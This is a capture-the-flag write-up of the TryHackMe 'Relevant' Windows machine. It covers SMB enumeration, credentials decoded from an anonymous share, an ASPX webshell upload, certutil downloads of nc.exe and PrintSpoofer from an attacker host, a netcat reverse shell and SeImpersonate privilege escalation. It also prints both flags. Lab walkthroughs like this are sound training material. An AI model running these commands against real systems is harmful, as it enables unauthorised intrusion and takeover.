Some machines fight you.

Some machines hide.

And then there are machines like Relevant that quietly leaks small clue and unravel completely.

The box doesn’t require any guessing, wordlists, or brute force.

It requires paying attention.

We’ll go through it using the real attacker mindset:

1. Enumeration
2. Web Footprinting
3. Initial Foothold
4. Privilege Escalation

Enumeration

Every engagement starts the same way, ask the machine who it is.

┌──(root㉿ryuk)-[/home/ryuk]
└─# nmap -A -p- 10.49.185.22                      
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-17 15:07 -0500
Nmap scan report for 10.49.185.22
Host is up (0.0071s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Windows Server 2016 Standard Evaluation 14393 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: RELEVANT
|   NetBIOS_Domain_Name: RELEVANT
|   NetBIOS_Computer_Name: RELEVANT
|   DNS_Domain_Name: Relevant
|   DNS_Computer_Name: Relevant
|   Product_Version: 10.0.14393
|_  System_Time: 2026-02-17T20:10:32+00:00
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2026-02-16T20:06:06
|_Not valid after:  2026-08-18T20:06:06
|_ssl-date: 2026-02-17T20:11:11+00:00; -1s from scanner time.
49663/tcp open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2016 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 3 hops
Service Info: Host: RELEVANT; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
|   Computer name: Relevant
|   NetBIOS computer name: RELEVANT\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2026-02-17T12:10:32-08:00
| smb2-time: 
|   date: 2026-02-17T20:10:34
|_  start_date: 2026-02-17T20:06:06
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 1h35m59s, deviation: 3h34m39s, median: 0s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
TRACEROUTE (using port 80/tcp)
HOP RTT     ADDRESS
1   3.82 ms 192.168.128.1
2   ...
3   4.80 ms 10.49.185.22
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 216.87 seconds

When I saw the scan results it felt like the box was hinting at its weakness. Windows Server 2016 with IIS on two ports, SMB open, RDP exposed and SMB signing disabled. In CTFs when Windows, SMB and a web server appear together I stop attacking the webpage and think about moving files instead. So I focused on the network first because that is usually where the real entry point is.

We execute smbclient with Null session and we evidence a rare share name.

──(root㉿ryuk)-[/home/ryuk]
└─# smbclient -L 10.49.185.22
Password for [WORKGROUP\root]:
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        nt4wrksv        Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.49.185.22 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

A custom share. That’s rarely accidental. Let’s open it:

┌──(root㉿ryuk)-[/home/ryuk]
└─# smbclient //10.49.185.22/nt4wrksv
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Jul 25 17:46:04 2020
  ..                                  D        0  Sat Jul 25 17:46:04 2020
  passwords.txt                       A       98  Sat Jul 25 11:15:33 2020
                7735807 blocks of size 4096. 4928016 blocks available
smb: \> get passwords.txt
getting file \passwords.txt of size 98 as passwords.txt (3.1 KiloBytes/sec) (average 3.1 KiloBytes/sec)
smb: \> exit

This machine is already telling a story, a password file on an anonymous share. Let’s see what we got:

┌──(root㉿ryuk)-[/home/ryuk]
└─# cat passwords.txt     
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk                                                                                                                                                                                                                                           
┌──(root㉿ryuk)-[/home/ryuk]
└─# echo -n "Qm9iIC0gIVBAJCRXMHJEITEyMw==" | base64 -d;echo""
Bob - !P@$$W0rD!123
                                                                                                                                                                                                                                           ┌──(root㉿ryuk)-[/home/ryuk]
└─# echo -n "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" | base64 -d;echo""
Bill - Juw4nnaM4n420696969!$$$

So we got the identities, but we must check permissions before login.

[+] IP: 10.49.185.22:445        Name: 10.49.185.22              Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        nt4wrksv                                                READ, WRITE
[*] Closed 1 connections

This changes everything, we can make the server execute our files. Let’s move forward and get those flags.

Web Footprinting

If IIS is running and a writable share exists, the question becomes:

Is this share mapped to the web server?

We upload a “aspx_cmd.aspx“, this is a webshell for execute commands from browser. You can get it from github.

┌──(root㉿ryuk)-[/home/ryuk]
└─# smbclient //10.49.185.22/nt4wrksv -U 'Bob%!P@$$W0rD!123'
Try "help" to get a list of possible commands.
smb: \> put aspx_cmd.aspx
aspx_cmd.aspx does not exist
smb: \> put aspx_cmd.aspx
putting file aspx_cmd.aspx as \aspx_cmd.aspx (23.7 kB/s) (average 23.7 kB/s)
smb: \> dir
  .                                   D        0  Tue Feb 17 15:26:39 2026
  ..                                  D        0  Tue Feb 17 15:26:39 2026
  aspx_cmd.aspx                       A      558  Tue Feb 17 15:26:39 2026
  passwords.txt                       A       98  Sat Jul 25 11:15:33 2020
                7735807 blocks of size 4096. 5101869 blocks available
smb: \> exit

Working path for the file:

http://10.49.185.22:49663/nt4wrksv/aspx_cmd.aspx

Need to confirm if it is a success or not.

We have RCE but we need shell, so we upgrade.

Initial Foothold

Start listener in one terminal and host netcat in another.

#Start listener
rlwrap nc -lvnp 4444
#Host Netcat
python3 -m http.server 80

Open browser again and download it on the victim and then execute reverse shell.

#Download it on the victim
certutil -urlcache -f http://192.168.223.118/nc.exe C:\Windows\Temp\nc.exe
#Execute reverse shell
C:\Windows\Temp\nc.exe -e cmd.exe 192.168.223.118 4444

If you execute the above steps properly you’ll be rewarded with:

┌──(ryuk㉿ryuk)-[~]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.223.118] from (UNKNOWN) [10.49.185.22] 49937
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool

Now, we need to get the user.txt flag. It’s easy to find once you are in.

Once I had the shell, I started poking around the usual places and headed straight into the C:\Usersfolder. There were three profiles, but Bob stood out since we already knew his name from earlier. Inside his Desktop sat a small but satisfying reward user.txt. Opening it confirmed we had user level access.

C:\Users\Bob\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is AC3C-5CB5
 Directory of C:\Users\Bob\Desktop
07/25/2020  01:04 PM    <DIR>          .
07/25/2020  01:04 PM    <DIR>          ..
07/25/2020  07:24 AM                35 user.txt
               1 File(s)             35 bytes
               2 Dir(s)  20,899,524,608 bytes free
C:\Users\Bob\Desktop>type user.txt
type user.txt
THM{fdk4ka34vk346ksxfr21tg789ktf45}

Privilege Escalation

Now comes the real target. First we check the privileges:

c:\windows\system32\inetsrv>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            DisabSeImpersonatePrivilege Enabled

I started to Google the abuse of this information in Windows 2016. On Windows Server 2016 SeImpersonatePrivilege Enabled is basically a green light for a token impersonation exploit, so I went with PrintSpoofer.

First I pulled the binary onto the machine, then ran it and boom, we took full control:

C:\Users\Bob\Desktop>cd C:\Windows\Temp
C:\Windows\Temp>certutil -urlcache -f http://192.168.223.118/PrintSpoofer64.exe PrintSpoofer64.exe
certutil -urlcache -f http://192.168.223.118/PrintSpoofer64.exe PrintSpoofer64.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.
C:\Windows\Temp>PrintSpoofer64.exe -i -c cmd
PrintSpoofer64.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>

After spending some time to think of the exact path for root.txt, I finally got it.

C:\Windows\system32>type c:\users\administrator\\desktop\root.txt
type c:\users\administrator\\desktop\root.txt
THM{1fk5kf469devly1gl320zafgl345pv}

What I Learned From The Lab?

Relevant isn’t about exploiting software.

It’s about understanding relationships between services. Each step alone looked harmless.

Most real attacks don’t break systems.
They connect features that were never meant to interact.

And that’s exactly what made this machine… Relevant.